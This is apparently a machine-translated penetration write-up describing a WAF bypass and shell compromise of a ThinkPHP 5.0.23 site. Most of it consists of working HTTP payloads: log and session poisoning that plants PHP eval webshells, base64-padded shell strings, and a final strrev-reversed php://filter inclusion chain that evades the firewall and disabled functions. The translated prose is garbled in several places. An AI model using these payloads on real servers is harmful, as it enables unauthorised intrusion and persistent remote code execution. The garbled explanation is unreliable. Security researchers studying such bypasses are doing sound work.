0x00 Foreword
Friend before the stations, took a long time and finally won, simply record it.
0x01 basic information
Vulnerability point: tp 5 method of code execution, payload follows
POST /?s=captcha _method=__construct&method=get&filter[]=assert&server[]=1&get[]=1
No echo, according to judge the success of the target payload thinkphp version should be 5.0.23
There waf, waf blocked following
php标记: <?php <?= <? php 函数: base64_decode file_get_contents convert_uuencode 关键字: php://
linux
The following functions are disabled disable_function
passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server
php 7.1.7 (although the
assert
function is not disable_function but has been unable to usecall_user_func
the callback is invoked)
0x02 breakthrough
Now tp 5 method of code to perform some ideas developed, nothing more than the following two:
1, write the log, the log contains getshell. payload as follows:
写shell进日志
_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]=<?php eval($_POST['x'])?>
通过日志包含getshell
_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=../data/runtime/log/201901/21.log&x=phpinfo();
2, write session, contains session getshell. payload as follows:
写shell进session
POST /?s=captcha HTTP/1.1
Cookie: PHPSESSID=kking
_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1
包含session getshell
POST /?s=captcha
_method=__construct&method=get&filter[]=think\__include_file&get[]=tmp\sess_kking&server[]=1
And these two methods are not available here, because waf for <?php
keywords such as the interception, there are other ways?
base64 encoding php: // filter pseudo-protocol
If it can be deformed like a keyword or encoding, such as base64 encoding:
If our session file /tmp/sess_kking
, reads as follows
PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+
<?php @eval($_GET['r']);;?>
Because the final use by inlcude
conduct that contains the method is actually very easy to think you can take advantage of php://filter/read=convert.base64-decode/resource=/tmp/sess_kking
the way to decode
The final execution similar to the following:
include('php://filter/read=convert.base64-decode/resource=/tmp/sess_kking');
But the session there will be other characters
How to make php://filter
the right decode it?
So here, too, as long as we construct the appropriate character, so that we can correct the webshell can be base64 decoded.
Local test
The first step, setting session
POST /?s=captcha
_method=__construct&filter[]=think\Session::set&method=get&get[]=adPD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8%2bab&server[]=1
(Note: This number needed + urlencode
encoded% 2b, write or will session
be spaces urldecode time, resulting in failure codec).
Point 1 question: Why not PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Pz4= (<?php @eval($_GET['r']);?>)
instead PD9waHAgQGV2YWwoJF9HRVRbJ3InXSk7Oz8+ (<?php @eval($_GET['r']);;?>)
of it,
A: Yes, because no matter how directly the former patchwork character, no law correctly decoded.
Point 2 questions: Why is payload
around there will be two ab
?
A: Yes, in order to allow shell payload
the two strings before and after the string meet base64 decoded length, so that it can properly decode.
The second step includes the successful implementation of the code:
Local test case, but you could not find the target test execution, because our payload using php://filter
the protocol contains the php://
keyword
How to make keyword is not allowed to do?
Details tp 5 method of code execution
Let us carefully observe the code execution Request.php
is filterValue
how the method is executing code.
We note that filter
actually can pass multiple, while the parameters for the parameter reference.
So in fact, we can deliver more filter
come to the right value
to make multiple passes treatment. The first base64_decode
passed to the decoded value will include
be contained.
But this waf online is base64_decode
the function of the filter, tested found to be using strrev
the inverse function breakthrough. Taking into account waf problem, we use shell payload
Cadogan layer of base64 encoding.
Similarly here, why should a few more payload semicolon do not need to explain
Back to our getshell
step, executed on the target
1. Set session
:
POST /?s=captcha
Cookie: PHPSESSID=kktest
_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1
( payload
Both before and after ab
the same is to base64
decode the reason Minato characters)
2, the file containing
POST /?s=captcha&r=cGhwaW5mbygpOw==
_method=__construct&filter[]=strrev&filter[]=think\__include_file&method=get&server[]=1&get[]=tsetkk_sses/pmt/=ecruoser/edoced-46esab.trevnoc=daer/retlif//:php
The ultimate success to bypass the firewall getshell
.
0x03 summary
Overall very interesting, also spent several nights, the ultimate success getshell
is very cool. (Fortunately did not give up :)